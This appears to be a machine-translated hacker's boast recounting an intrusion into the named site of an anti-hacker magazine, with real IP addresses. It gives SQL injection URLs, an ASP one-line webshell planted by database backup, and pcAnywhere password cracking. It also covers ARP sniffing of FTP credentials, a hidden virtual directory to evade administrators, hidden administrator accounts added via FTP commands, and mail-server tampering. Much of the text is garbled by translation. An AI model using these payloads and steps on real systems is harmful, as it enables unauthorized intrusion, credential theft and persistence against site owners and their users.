Hacker defense-danger from external hosts

It doesn't matter if I want to engage you, but if you are a little overdo, sell your money with someone else's manuscript, and decorate yourself with someone else's technology. I have to remind you that your superiority is based on others' contributions.
1. Scan and find FTP on ..... No common vulnerabilities ..... Determines ARP spoofing for sniffing.

 

2. Find the sniffing Host:
C:/> Ping hacker.com.cn
Pinging hacker.com.cn [211.157.102.239] with 32 bytes of data:
Start scanning port 211.157.102.1-211.157.102.255 80 + 1433, locate a site in the default directory, and find the injection vulnerability.
Http://xx.xx.xx.xx/111.asp? Id = 3400 and 1 = (select is_srvrolemember ('sysadmin '))
No SA permission found:

Http://xx.xx.xx.xx/111.asp? Id = 3400 and 1 = (Select name from Master. DBO. sysdatabases where dbid = 7)
Obtain the database name ku1:

Come on, find a way to create a shell (here, the night brother and the smelly rice brother provided the information), do not understand, look at the online information:
Http://xx.xx.xx.xx/111.asp? Id = 3400; Create Table [DBO]. [Xiaolu] ([Xiaoxue] [char] (255 ));--
Http://xx.xx.xx.xx/111.asp? Id = 3400; declare @ result varchar (255) exec master. DBO. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System/controlset001/services/w3svc/parameters/virtual roots', '/', @ result output insert into Xiaolu (Xiaoxue) values (@ result );--
Http://xx.xx.xx.xx/111.asp? Id = 3400 and (select top 1 Xiaoxue from Xiaolu) = 1
The following figure shows the web path D:/xxxx:
Http://xx.xx.xx.xx/111.asp? Id = 3400; Use ku1 ;--
Http://xx.xx.xx.xx/111.asp? Id = 3400; Create Table cmd (STR image );--
Http://xx.xx.xx.xx/111.asp? Id = 3400; insert into cmd (STR) values ('<% if request ("A") <> "" then execute request ("A") %> ');--
Http://xx.xx.xx.xx/111.asp? Id = 3400; backup database ku1 to disk = 'd:/xxxx/L. asp ';--
(For the use of this shell, see the animation http://666w.cn/down/view.asp of the smallest ASP backdoor? Id = 754)
Upload ............ shell, and prepare to escalate the permission .......... Find pcAnywhere and find:
C:/Documents and Settings/all users/Application Data/Symantec/pcAnywhere/PCA. XXX. CIF
The password is cracked and the pcAnywhere connection seems to be helpful to me. Everything goes smoothly. The admin password is the same as the pcAnywhere password. :), tracert:
1 <10 MS <10 MS <10 MS 211.157.102.239
Alas, ARP spoofing can be performed when the anti-DDOS service is in this situation. (For ARP spoofing, refer to an article http://bbs.666w.cn/dispbbs.asp I wrote in? Boardid = 7 & id = 764 & page = 1)
Use webshell to upload the required software:
Winpcap.exe arpsniffer.exe pv.exe
Arpsniffer.exe ------------ 57 K Rongge's sniffing tool in the exchange environment
Pv.exe ---------------- 60 K (a command line program attached to prcview, which has been executed by huajun) to kill the process
A driver used by winpcap.exe ---------------- 678 K sniffing
Install winpcap.exe. Next, click Next.
Create a hidden virtual directory (how to create your own data query), and set the application protection to low so that we can use webshell to run ARP programs. Otherwise, it will be difficult for administrators to find out.

3. Start sniffing:
OK, continue ........ start sniffer ........ due to the current Chinese network structure and related technical personnel quality issues. this can be said to be a hundred thousand, run:
Arpsniffer.exe 211.157.102.254 211.157.102.239 21 C:/111.txt 1
211.157.102.254 is the gateway, 211.157.102.239 is the anti-Black IP, C:/111.txt is the log file, and 1 is the NIC ID
What to do next? Of course it is waiting ....... but we don't want to wait a few days. we hope we can make it better. tell the dark brother to take action (), the only person is on QQ (),

Night:
"Black anti-DDoS has been hacked. I heard someone has gone up... let's take a look ..."
Exclusive:
Well, I will check it out.
This is omitted .....

Haha ...... the result does not need to be said. A few minutes later, we will see a significant increase in the log file, because the arpsnifer process is running and we cannot directly see it, So we run it using webshell:
PV-K-F arpsniffer.exe
Kill the process and check the password ~~~~~~

4. At work:
It's the FTP, http://978229.hacker.com.cn! You can browse all without a security disk, ah, Duck, you used to E:/wwwroot, haha.
Continue. Continue fpipe-V-l 3041-r 43958 127.0.0.1.
Add an FTP user, set it as an administrator, and log on to and run

Quote site exec net1king Xiaolu Xiaoxue/Add
Quote site exec net1king localgroup administrators Xiaolu/Add

3389 login, ah, no, continue

Quote site exec net1king Xiaolu Xiaoxue @@! #! @#@!! ##@ 123/Add
Quote site exec net1king localgroup administrators Xiaolu/Add

Haha, I also made password restrictions and went in. Next I will not talk about it. It will make anti-DDoS edit a headache ........ (N content is omitted here)

Let's take a look at some good things and find out there is a webeasymail server. Read the mail and look at the documents that make the editors better off. I don't know what the password looks like.

Hey, come with me: D:/mail/. Each user directory has userweb. ini
Open, modify
Questioninfo = 1
Answerinfo = 1
Hintinfo = 1

Open hosts

It's time to retreat, and leave the rest to the editors.
V. Summary:
This intrusion lasted about one hour. There was no advanced technology, but it was a simple technology. Sniffing penetration was a technology several years ago, and SQL injection was a popular method, it's not new. The FTP password can be obtained so quickly thanks to the application of "social engineering" in the dark.
Although the technology is very valuable, flexible use will make the technology more valuable.